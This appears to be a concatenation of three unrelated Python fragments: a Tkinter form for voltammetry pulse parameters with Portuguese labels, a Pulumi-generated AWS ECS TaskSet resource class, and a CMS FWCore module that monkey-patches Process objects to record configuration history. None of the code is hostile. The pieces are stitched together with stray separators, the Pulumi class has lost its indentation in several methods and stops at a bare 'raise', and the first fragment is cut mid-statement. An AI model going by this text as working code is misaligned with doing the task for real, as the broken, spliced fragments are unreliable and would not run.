es.lbStyle(w.lb_PPasso)
w.lb_PPasso.configure(text='''Pot. Passo (V)''')
w.lb_PPasso.configure(width=81)
w.et_PPasso.configure(validate="key")
w.et_PPasso.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PPasso.place(relx=0.59, y=70, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PPasso)
ctrl.validation.entryInsert(w.et_PPasso, md_dpv.pPas)
w.lb_PPulso = tk.Label(w.fr_analise, anchor="w")
w.lb_PPulso.place(relx=0.053, y=95, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PPulso)
w.lb_PPulso.configure(text='''Pot. Pulso (V)''')
w.et_PPulso = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PPulso.place(relx=0.59, y=96, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PPulso)
ctrl.validation.entryInsert(w.et_PPulso, md_dpv.pPul)
w.lb_TPulso = tk.Label(w.fr_analise, anchor="w")
w.lb_TPulso.place(relx=0.053, y=121, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_TPulso)
w.lb_TPulso.configure(text='''Tem. Pulso (s)''')
w.lb_TPulso.configure(width=91)
w.et_TPulso = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_TPulso.place(relx=0.59, y=122, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_TPulso)
ctrl.validation.entryInsert(w.et_TPulso, md_dpv.tPul)
w.lb_tPasso = tk.Label(w.fr_analise, anchor="w")
w.lb_tPasso.place(relx=0.053, y=147, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_tPasso)
w.lb_tPasso.configure(text='''Tem. Passo (s)''')
w.et_tPasso.configure(validate="key")
w.et_tPasso.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_tPasso.place(relx=0.59, y=148, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_tPasso)
ctrl.validation.entryInsert(w.et_tPasso, md_dpv.tPas)
w.lb_tEquil = tk.Label(w.fr_analise, anchor="w")
w.lb_tEquil.place(relx=0.053, y=173, height=21, width=110
, bordermode='ignore')
es.lbStyle(w.lb_tEquil)
w.lb_tEquil.configure(text='''Tem. equilíbrio (s)''')
w.et_tEquil = tk.Entry(w.fr_analise, validate="key", validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_tEquil.place(relx=0.59, y=174, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_tEquil)
ctrl.validation.entryInsert(w.et_tEquil, md_dpv.tEqu)
w.lb_currentRange = tk.Label(w.fr_analise, anchor="w")
w.lb_currentRange.place(relx=0.053, y=199, height=21, width=91
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['TaskSetArgs', 'TaskSet']
@pulumi.input_type
class TaskSetArgs:
    def __init__(__self__, *,
                 cluster: pulumi.Input[str],
                 service: pulumi.Input[str],
                 task_definition: pulumi.Input[str],
                 external_id: Optional[pulumi.Input[str]] = None,
                 launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
                 load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]] = None,
                 network_configuration: Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']] = None,
                 platform_version: Optional[pulumi.Input[str]] = None,
                 scale: Optional[pulumi.Input['TaskSetScaleArgs']] = None,
                 service_registries: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]] = None):
        """
        The set of arguments for constructing a TaskSet resource.
        :param pulumi.Input[str] cluster: The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
        :param pulumi.Input[str] service: The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
        :param pulumi.Input[str] task_definition: The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
        :param pulumi.Input[str] external_id: An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
        :param pulumi.Input['TaskSetLaunchType'] launch_type: The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
        :param pulumi.Input[str] platform_version: The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
        :param pulumi.Input['TaskSetScaleArgs'] scale: A floating-point percentage of the desired number of tasks to place and keep running in the task set.
        :param pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]] service_registries: The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
        """
        # Required inputs are always stored.
        pulumi.set(__self__, "cluster", cluster)
        pulumi.set(__self__, "service", service)
        pulumi.set(__self__, "task_definition", task_definition)
        # Optional inputs are stored only when provided, so unspecified
        # properties fall through to the provider/service defaults.
        if external_id is not None:
            pulumi.set(__self__, "external_id", external_id)
        if launch_type is not None:
            pulumi.set(__self__, "launch_type", launch_type)
        if load_balancers is not None:
            pulumi.set(__self__, "load_balancers", load_balancers)
        if network_configuration is not None:
            pulumi.set(__self__, "network_configuration", network_configuration)
        if platform_version is not None:
            pulumi.set(__self__, "platform_version", platform_version)
        if scale is not None:
            pulumi.set(__self__, "scale", scale)
        if service_registries is not None:
            pulumi.set(__self__, "service_registries", service_registries)
@property
@pulumi.getter
def cluster(self) -> pulumi.Input[str]:
"""
The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
"""
return pulumi.get(self, "cluster")
@cluster.setter
def cluster(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster", value)
    @property
    @pulumi.getter
    def service(self) -> pulumi.Input[str]:
        """
        The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
        """
        return pulumi.get(self, "service")
    @service.setter
    def service(self, value: pulumi.Input[str]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "service", value)
    @property
    @pulumi.getter(name="taskDefinition")
    def task_definition(self) -> pulumi.Input[str]:
        """
        The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
        """
        return pulumi.get(self, "task_definition")
    @task_definition.setter
    def task_definition(self, value: pulumi.Input[str]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "task_definition", value)
    @property
    @pulumi.getter(name="externalId")
    def external_id(self) -> Optional[pulumi.Input[str]]:
        """
        An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
        """
        return pulumi.get(self, "external_id")
    @external_id.setter
    def external_id(self, value: Optional[pulumi.Input[str]]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "external_id", value)
    @property
    @pulumi.getter(name="launchType")
    def launch_type(self) -> Optional[pulumi.Input['TaskSetLaunchType']]:
        """
        The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
        """
        return pulumi.get(self, "launch_type")
    @launch_type.setter
    def launch_type(self, value: Optional[pulumi.Input['TaskSetLaunchType']]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "launch_type", value)
    @property
    @pulumi.getter(name="loadBalancers")
    def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]]:
        """
        A list of load balancer configurations (``TaskSetLoadBalancerArgs``) for the task set.
        """
        return pulumi.get(self, "load_balancers")
    @load_balancers.setter
    def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "load_balancers", value)
    @property
    @pulumi.getter(name="networkConfiguration")
    def network_configuration(self) -> Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']]:
        """
        The network configuration (``TaskSetNetworkConfigurationArgs``) for the task set.
        """
        return pulumi.get(self, "network_configuration")
    @network_configuration.setter
    def network_configuration(self, value: Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "network_configuration", value)
    @property
    @pulumi.getter(name="platformVersion")
    def platform_version(self) -> Optional[pulumi.Input[str]]:
        """
        The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
        """
        return pulumi.get(self, "platform_version")
    @platform_version.setter
    def platform_version(self, value: Optional[pulumi.Input[str]]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "platform_version", value)
    @property
    @pulumi.getter
    def scale(self) -> Optional[pulumi.Input['TaskSetScaleArgs']]:
        """
        A floating-point percentage of the desired number of tasks to place and keep running in the task set.
        """
        return pulumi.get(self, "scale")
    @scale.setter
    def scale(self, value: Optional[pulumi.Input['TaskSetScaleArgs']]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "scale", value)
    @property
    @pulumi.getter(name="serviceRegistries")
    def service_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]]:
        """
        The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
        """
        return pulumi.get(self, "service_registries")
    @service_registries.setter
    def service_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]]):
        # Write-accessor: stores the value in the resource's pulumi input map.
        pulumi.set(self, "service_registries", value)
class TaskSet(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cluster: Optional[pulumi.Input[str]] = None,
                 external_id: Optional[pulumi.Input[str]] = None,
                 launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
                 load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetLoadBalancerArgs']]]]] = None,
                 network_configuration: Optional[pulumi.Input[pulumi.InputType['TaskSetNetworkConfigurationArgs']]] = None,
                 platform_version: Optional[pulumi.Input[str]] = None,
                 scale: Optional[pulumi.Input[pulumi.InputType['TaskSetScaleArgs']]] = None,
                 service: Optional[pulumi.Input[str]] = None,
                 service_registries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]]] = None,
                 task_definition: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Create a task set in the specified cluster and service. This is used when a service uses the EXTERNAL deployment controller type. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-types.html in the Amazon Elastic Container Service Developer Guide.
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cluster: The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
        :param pulumi.Input[str] external_id: An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
        :param pulumi.Input['TaskSetLaunchType'] launch_type: The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
        :param pulumi.Input[str] platform_version: The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
        :param pulumi.Input[pulumi.InputType['TaskSetScaleArgs']] scale: A floating-point percentage of the desired number of tasks to place and keep running in the task set.
        :param pulumi.Input[str] service: The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]] service_registries: The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
        :param pulumi.Input[str] task_definition: The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: TaskSetArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Create a task set in the specified cluster and service. This is used when a service uses the EXTERNAL deployment controller type. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-types.html in the Amazon Elastic Container Service Developer Guide.
        :param str resource_name: The name of the resource.
        :param TaskSetArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TaskSetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster: Optional[pulumi.Input[str]] = None,
external_id: Optional[pulumi.Input[str]] = None,
launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetLoadBalancerArgs']]]]] = None,
network_configuration: Optional[pulumi.Input[pulumi.InputType['TaskSetNetworkConfigurationArgs']]] = None,
platform_version: Optional[pulumi.Input[str]] = None,
scale: Optional[pulumi.Input[pulumi.InputType['TaskSetScaleArgs']]] = None,
service: Optional[pulumi.Input[str]] = None,
service_registries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]]] = None,
task_definition: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise | |
from copy import deepcopy
import inspect
ACTIVATE_INSPECTION=True
#### helpers for inspection ####
def auto_inspect():
    """Return the caller's stack with leading FWCore config-machinery frames
    stripped, or a single ("unknown",...) placeholder entry when inspection
    is disabled or no usable frame remains."""
    fallback = [("unknown", "unknown", "unknown")]
    if not ACTIVATE_INSPECTION:
        return fallback
    frames = inspect.stack()
    # Skip frames originating from the config/GUI machinery itself.
    skip = 0
    while skip < len(frames) and len(frames[skip]) >= 2 and \
            ('FWCore/ParameterSet' in frames[skip][1] or 'FWCore/GuiBrowsers' in frames[skip][1]):
        skip += 1
    frames = frames[skip:]
    if frames and len(frames[0]) >= 3:
        return frames
    return fallback
#### patches needed for deepcopy of process ####
import FWCore.ParameterSet.DictTypes as typ
def new_SortedKeysDict__copy__(self):
    # Shallow copy: rebuild via the constructor so the key order is preserved.
    return self.__class__(self)
typ.SortedKeysDict.__copy__ = new_SortedKeysDict__copy__
def new_SortedKeysDict__deepcopy__(self, memo=None):
    # Deep copy that honours the deepcopy memo, so shared or recursive
    # references inside a Process are copied only once.
    from copy import deepcopy
    if memo is None:
        memo = {}
    d = memo.get(id(self), None)
    if d is not None:
        return d
    # Register the new instance in the memo *before* copying the items so a
    # self-referencing structure terminates.
    memo[id(self)] = d = self.__class__()
    d.__init__(deepcopy(self.items(), memo))
    return d
typ.SortedKeysDict.__deepcopy__ = new_SortedKeysDict__deepcopy__
#### process history ####
import FWCore.ParameterSet.Config as cms
def new___init__(self,name):
    """Replacement for Process.__init__: run the original constructor, then
    attach the bookkeeping fields used by the history/modification patches."""
    self.old___init__(name)
    self.__dict__['_Process__history'] = []  # recorded (tool, modified-objects) entries
    self.__dict__['_Process__enableRecording'] = 0  # >0 means recording is suspended
    self.__dict__['_Process__modifiedobjects'] = []  # objects placed/changed since last reset
    self.__dict__['_Process__modifiedcheckpoint'] = None  # optional name filter for dumps
    self.__dict__['_Process__modifications'] = []  # attribute replacements seen by __setattr__
cms.Process.old___init__=cms.Process.__init__
cms.Process.__init__=new___init__
def new_modifiedObjects(self):
    # Accessor for the objects modified since the last reset.
    return self.__dict__['_Process__modifiedobjects']
cms.Process.modifiedObjects=new_modifiedObjects
def new_resetModifiedObjects(self):
    # Clear the modified-objects list.
    self.__dict__['_Process__modifiedobjects'] = []
cms.Process.resetModifiedObjects=new_resetModifiedObjects
def new__place(self, name, mod, d):
    # Wrap Process._place so every successfully placed module is recorded.
    self.old__place(name, mod, d)
    # NOTE(review): _okToPlace is consulted *after* old__place has already run;
    # presumably it still evaluates True when the placement succeeded — confirm.
    if self._okToPlace(name, mod, d):
        self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__place=cms.Process._place
cms.Process._place=new__place
def new__placeSource(self, name, mod):
    # Record the placed source in the modified-objects list.
    self.old__placeSource(name, mod)
    self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeSource=cms.Process._placeSource
cms.Process._placeSource=new__placeSource
def new__placeLooper(self, name, mod):
    # Record the placed looper in the modified-objects list.
    self.old__placeLooper(name, mod)
    self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeLooper=cms.Process._placeLooper
cms.Process._placeLooper=new__placeLooper
def new__placeService(self, typeName, mod):
    # Record the placed service in the modified-objects list.
    self.old__placeService(typeName, mod)
    self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeService=cms.Process._placeService
cms.Process._placeService=new__placeService
def new_setSchedule_(self, sch):
    # Record schedule assignment in the modified-objects list.
    self.old_setSchedule_(sch)
    self.__dict__['_Process__modifiedobjects'].append(sch)
cms.Process.old_setSchedule_=cms.Process.setSchedule_
cms.Process.setSchedule_=new_setSchedule_
def new_setLooper_(self, lpr):
    # Record looper assignment in the modified-objects list.
    self.old_setLooper_(lpr)
    self.__dict__['_Process__modifiedobjects'].append(lpr)
cms.Process.old_setLooper_=cms.Process.setLooper_
cms.Process.setLooper_=new_setLooper_
def new_history(self, removeDuplicates=False):
    # Full history: recorded tool actions plus any still-pending modifications.
    return self.__dict__['_Process__history']+self.dumpModificationsWithObjects(removeDuplicates)
cms.Process.history=new_history
def new_resetHistory(self):
    # Drop all recorded actions and all pending modification state.
    self.__dict__['_Process__history'] = []
    self.resetModified()
    self.resetModifiedObjects()
cms.Process.resetHistory=new_resetHistory
def new_dumpHistory(self,withImports=True):
    """Render the history as executable python text.  Note: this module
    targets Python 2 (``unicode``, the ``print`` statement below)."""
    dumpHistory=[]
    for item,objects in self.history():
        if isinstance(item,(str,unicode)):
            dumpHistory.append(item +"\n")
        else: # isTool
            print item  # NOTE(review): looks like a leftover debug print — confirm
            dump=item.dumpPython()
            if isinstance(dump,tuple):
                # dump == (import statement, body); emit each import only once.
                if withImports and dump[0] not in dumpHistory:
                    dumpHistory.append(dump[0])
                dumpHistory.append(dump[1] +"\n")
            else:
                dumpHistory.append(dump +"\n")
    return ''.join(dumpHistory)
cms.Process.dumpHistory=new_dumpHistory
def new_addAction(self,tool):
    # Record an applied tool together with everything it touched — unless
    # recording is currently disabled (counter > 0).
    if self.__dict__['_Process__enableRecording'] == 0:
        modifiedObjects=self.modifiedObjects()
        for m,o in self.dumpModificationsWithObjects():
            modifiedObjects+=o
        self.__dict__['_Process__history'].append((tool,modifiedObjects))
        self.resetModified()
        self.resetModifiedObjects()
cms.Process.addAction=new_addAction
def new_deleteAction(self,i):
    # Remove the i-th recorded action from the history.
    del self.__dict__['_Process__history'][i]
cms.Process.deleteAction=new_deleteAction
def new_disableRecording(self):
    # Nested disable counter: only the outermost disable flushes the pending
    # modifications into the history before suspending recording.
    if self.__dict__['_Process__enableRecording'] == 0:
        # remember modifications in history
        self.__dict__['_Process__history']+=self.dumpModificationsWithObjects()
        self.resetModified()
        self.resetModifiedObjects()
    self.__dict__['_Process__enableRecording'] += 1
cms.Process.disableRecording=new_disableRecording
def new_enableRecording(self):
    # Decrement the disable counter; recording resumes when it reaches zero.
    self.__dict__['_Process__enableRecording'] -= 1
cms.Process.enableRecording=new_enableRecording
def new_checkRecording(self):
    # True while recording is active (no outstanding disableRecording calls).
    return self.__dict__['_Process__enableRecording']==0
cms.Process.checkRecording=new_checkRecording
def new_setattr(self, name, value):
    """
    This catches modifications that occur during process.load,
    and only records a modification if there was an existing object
    and the version after __setattr__ has a different id().
    This does not mean that the object is different, only redefined.
    We still really need a recursive-comparison function for parameterizeable
    objects to determine if a real change has been made.
    """
    old = None
    existing = False
    # Private Process bookkeeping attributes are never treated as modifications.
    if not name.startswith('_Process__'):
        existing = hasattr(self, name)
        if existing:
            old = getattr(self, name)
    self.old__setattr__(name, value)
    if existing:
        if id(getattr(self, name)) != id(old):
            stack = auto_inspect()
            # Deep-copy both versions so later mutation cannot rewrite history.
            self.__dict__['_Process__modifications'] += [{'name': name,
                                                          'old': deepcopy(old),
                                                          'new': deepcopy(getattr(self, name)),
                                                          'file':stack[0][1],'line':stack[0][2],
                                                          'action': 'replace'}]
cms.Process.old__setattr__ = cms.Process.__setattr__
cms.Process.__setattr__ = new_setattr
def new_recurseResetModified_(self, o):
    """
    Empty all the _modifications lists for
    all objects beneath this one.
    """
    # (fixed: removed an unused ``properties = []`` local and the unused
    # ``enumerate`` index in the list branch)
    if isinstance(o, cms._ModuleSequenceType):
        o.resetModified()
    if isinstance(o, cms._Parameterizable):
        o.resetModified()
        # Recurse into every named parameter of the parameterizable.
        for key in o.parameterNames_():
            value = getattr(o,key)
            self.recurseResetModified_(value)
    if isinstance(o, cms._ValidatingListBase):
        # Recurse into list-like containers (e.g. VPSet entries).
        for item in o:
            self.recurseResetModified_(item)
cms.Process.recurseResetModified_=new_recurseResetModified_
def new_recurseDumpModifications_(self, name, o):
    """
    Recursively return a standardised list of modifications
    from the object hierarchy.
    """
    modifications = []
    if isinstance(o, cms._ModuleSequenceType):
        # Sequence/path edits recorded by the _ModuleSequenceType patches below.
        if o._isModified:
            for mod in o._modifications:
                modifications.append({'name':name,
                                      'action':mod['action'],
                                      'old': mod['old'],
                                      'new': mod['new'],
                                      'file': mod['file'],
                                      'line': mod['line'],
                                      'dump': o.dumpPython({}),
                                      'type': 'seq'})
    if isinstance(o, cms._Parameterizable):
        # Parameter add/replace/delete records from the _Parameterizable patches.
        for mod in o._modifications:
            paramname = mod['name']
            # The parameter may have been deleted since the record was made.
            if hasattr(o, paramname):
                paramvalue = getattr(o, paramname)
            else:
                paramvalue = None
            if isinstance(paramvalue,cms._ParameterTypeBase):
                dump = paramvalue.dumpPython()
            else:
                dump = paramvalue
            modifications.append({'name': '%s.%s' %(name, paramname),
                                  'old': mod['old'],
                                  'new': mod['new'],
                                  'file': mod['file'],
                                  'line': mod['line'],
                                  'action': mod['action'],
                                  'dump': dump,
                                  'type': 'param'})
        # Loop over any child elements
        for key in o.parameterNames_():
            value = getattr(o,key)
            modifications += self.recurseDumpModifications_("%s.%s" % (name, key), value)
    if isinstance(o, cms._ValidatingListBase):
        for index, item in enumerate(o):
            modifications += self.recurseDumpModifications_("%s[%s]" % (name, index), item)
    if isinstance(o, cms.Process):
        # Top-level attribute replacements recorded by new_setattr above.
        for mod in o.__dict__['_Process__modifications']:
            if hasattr(o, mod['name']) and hasattr(getattr(o, mod['name']), 'dumpPython'):
                dump = getattr(o, mod['name']).dumpPython()
            else:
                dump = None
            modifications.append({'name': mod['name'],
                                  'action': mod['action'],
                                  'old': mod['old'],
                                  'new': mod['new'],
                                  'dump': dump,
                                  'file': mod['file'],
                                  'line': mod['line'],
                                  'type': 'process'})
    return modifications
cms.Process.recurseDumpModifications_=new_recurseDumpModifications_
def new_modificationCheckpoint(self):
    """
    Set a checkpoint: record the names of all currently-known top-level
    objects.  Modification dumps made later ignore anything whose name is
    not rooted at one of these.
    There is currently no way of clearing this, but I think this
    is generally a use-once feature.
    """
    known_names = {entry[0] for entry in self.items_()}
    self.__dict__['_Process__modifiedcheckpoint'] = list(known_names)
cms.Process.modificationCheckpoint=new_modificationCheckpoint
def new_resetModified(self):
    """
    Empty out all the modification lists, so we only see changes that
    happen from now onwards.
    """
    # NOTE(review): this clears '_Process__modified', but the list written by
    # new_setattr is '_Process__modifications' — the per-process record may
    # never be emptied here; confirm which key is intended.
    self.__dict__['_Process__modified'] = []
    for name, o in self.items_():
        self.recurseResetModified_(o)
cms.Process.resetModified=new_resetModified
def new_dumpModifications(self, comments=True, process=True, module=False, sequence=True, value=True, sort=True, group=True):
    """
    Return some text describing all the modifications that have been made.
    * comments: print out comments describing the file and line which triggered
      the modification, if determined.
    * process: print "process." in front of every name
    * module: only print out one entry per top-level module that has been
      changed, rather than the details
    * sequence: include changes to sequences
    * value: print out the latest value of each name
    * sort: whether to sort all the names before printing (otherwise they're in
      more-or-less time order, within each category)
    """
    modifications = self.recurseDumpModifications_('', self)
    text = []
    for name, o in self.items_():
        modifications += self.recurseDumpModifications_(name, o)
    if not sequence:
        # NOTE: relies on py2 filter() returning a list (len()/indexing below).
        modifications = filter(lambda x: not x['type'] == 'seq', modifications)
    checkpoint = self.__dict__['_Process__modifiedcheckpoint']
    if not checkpoint == None:
        # Keep only modifications rooted at a checkpointed top-level name.
        modifications = filter(lambda x: any([x['name'].startswith(check) for check in checkpoint]), modifications)
    if module:
        # Summary mode: one line per distinct top-level module name.
        value = False
        comments = False
        modules = list(set([m['name'].split('.')[0] for m in modifications]))
        if sort:
            modules = sorted(modules)
        if process:
            text = ['process.%s' % m for m in modules]
        else:
            text = modules
    else:
        if sort:
            modifications = sorted(modifications, key=lambda x: x['name'])
        for i, m in enumerate(modifications):
            t = ''
            if comments:
                if m['action'] == 'replace':
                    t += '# %(file)s:%(line)s replace %(old)s->%(new)s\n' % m
                elif m['action'] == 'remove':
                    t += '# %(file)s:%(line)s remove %(old)s\n' % m
                elif m['action'] == 'append':
                    t += '# %(file)s:%(line)s append %(new)s\n' % m
            # With grouping, only the last entry for a given name prints a value.
            if not group or i==len(modifications)-1 or not modifications[i+1]['name'] == m['name']:
                if process and value:
                    t += 'process.%s = %s' % (m['name'], m['dump'])
                elif value:
                    t += '%s = %s' % (m['name'], m['dump'])
                elif process:
                    t += 'process.%s' % (m['name'])
                else:
                    t += '%s' % (m['name'])
            text += [t]
    return '\n'.join(text)+'\n'
cms.Process.dumpModifications=new_dumpModifications
def new_dumpModificationsWithObjects(self, removeDuplicates=False):
    # Collect (dump-text, [top-level object]) pairs for every recorded
    # modification.  With removeDuplicates, consecutive records for the same
    # dotted name keep only the most recent entry.
    modifications = []
    last_modification=""
    for name, o in self.items_():
        for m in self.recurseDumpModifications_(name, o):
            # remove duplicate modifications
            if removeDuplicates and last_modification==m['name']:
                modifications.pop()
            last_modification=m['name']
            # add changes
            text = 'process.%s = %s' % (m['name'], m['dump'])
            modifications += [(text,[o])]
    return modifications
cms.Process.dumpModificationsWithObjects=new_dumpModificationsWithObjects
def new_moduleItems_(self):
    """Return (name, module) pairs for all producers, filters and analyzers."""
    collected = []
    for mapping in (self.producers, self.filters, self.analyzers):
        collected.extend(mapping.items())
    return tuple(collected)
cms.Process.moduleItems_=new_moduleItems_
def new_items_(self):
    """Return (name, object) pairs for every top-level component of the
    process: source, looper, modules, output modules, sequences, paths,
    endpaths, services, ES producers/sources/prefers, (V)PSets, schedule."""
    items = []
    if self.source:
        items += [("source", self.source)]
    if self.looper:
        items += [("looper", self.looper)]
    items += self.moduleItems_()
    items += self.outputModules.items()
    items += self.sequences.items()
    # Fixed: was ``self.paths.iteritems()`` — the only py2-only call in this
    # function.  ``items()`` yields the same pairs, matches every surrounding
    # line, and keeps the function py3-compatible.
    items += self.paths.items()
    items += self.endpaths.items()
    items += self.services.items()
    items += self.es_producers.items()
    items += self.es_sources.items()
    items += self.es_prefers.items()
    items += self.psets.items()
    items += self.vpsets.items()
    if self.schedule:
        items += [("schedule", self.schedule)]
    return tuple(items)
cms.Process.items_=new_items_
#### parameterizable history ####
def new_Parameterizable_init(self,*a,**k):
    # Seed the modification log before the original __init__ runs (the
    # addParameter patch fires during construction), then clear it so
    # construction-time adds are not reported as modifications.
    self.__dict__['_modifications'] = []
    self.old__init__(*a,**k)
    self._modifications = []
cms._Parameterizable.old__init__ = cms._Parameterizable.__init__
cms._Parameterizable.__init__ = new_Parameterizable_init
def new_Parameterizable_addParameter(self, name, value):
    # Record every parameter addition with its call-site file/line.
    self.old__addParameter(name,value)
    stack = auto_inspect()
    self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':None,'new':deepcopy(value),'action':'add'})
cms._Parameterizable.old__addParameter = cms._Parameterizable._Parameterizable__addParameter
cms._Parameterizable._Parameterizable__addParameter = new_Parameterizable_addParameter
def new_Parameterizable_setattr(self, name, value):
    # Log replacements of existing public parameters on unfrozen objects.
    if (not self.isFrozen()) and (not name.startswith('_')) and (name in self.__dict__):
        stack = auto_inspect()
        self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':deepcopy(self.__dict__[name]),'new':deepcopy(value),'action':'replace'})
        self._isModified = True
    self.old__setattr__(name,value)
cms._Parameterizable.old__setattr__ = cms._Parameterizable.__setattr__
cms._Parameterizable.__setattr__ = new_Parameterizable_setattr
def new_Parameterizeable_delattr(self, name):
    # Log parameter deletions on unfrozen objects before delegating.
    if not self.isFrozen():
        stack = auto_inspect()
        self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':deepcopy(self.__dict__[name]), 'new':None,'action':'delete'})
    self.old__delattr__(name)
